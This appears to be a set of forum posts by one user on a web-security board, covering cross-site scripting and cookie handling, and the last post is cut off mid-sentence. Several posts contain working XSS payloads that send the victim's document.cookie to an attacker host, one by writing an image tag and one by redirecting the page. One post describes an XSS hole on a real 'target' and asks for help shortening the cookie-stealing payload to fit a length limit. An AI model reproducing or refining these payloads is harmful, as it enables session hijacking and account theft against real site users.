Personally i always mess around with Cookie Editor(FF plugin) and log what cookies are being read by LiveHTTPheader(also FF plugin). Then continue from there :)
Forum: CSRF and Session Info

Ah now i see, it seems like i missunderstood you. You meant including a js that would use the picture as a method of posting. Didn't think of that, i merely refered and then had php refer it back once more. smart :)
Forum: SQL and Code Injection

Nice Reiners, i wasn't aware you could pass variables to index without actually specifying the file name. Heh fun. <script>document.write('<img src=http://my_host/1.php?a='+document.cookie+'>')</script> I suppose thats the aproach you mentioned Ronald? Interesting stuff :)
Forum: SQL and Code Injection

Yeah i tried that, but i needed to pass a parameter to a script on the remote location. So those wouldn't do ( as far as i know? ). Thanks though :)
Forum: SQL and Code Injection

i tried that before, unfortunatly it didnt work. thanks though, any other ideas? Update: After messing around with it a bit more, i found that this did work: <SCRIPT SRC=//#####.com/#####/xss> Thanks .mario
Forum: SQL and Code Injection

First post on sla.ckers, been reading the blog for roughly a year now and loving it. Anyway, i found an xss hole on my target.. but in order to apply it properly i need to stay below a 70 char limit. <script>window.location="www.######.nl/1/1.php?a="+document.cookie</script> In other words, the code above needs to go down an additional 6 bytes. I certainly lack the
Forum: SQL and Code Injection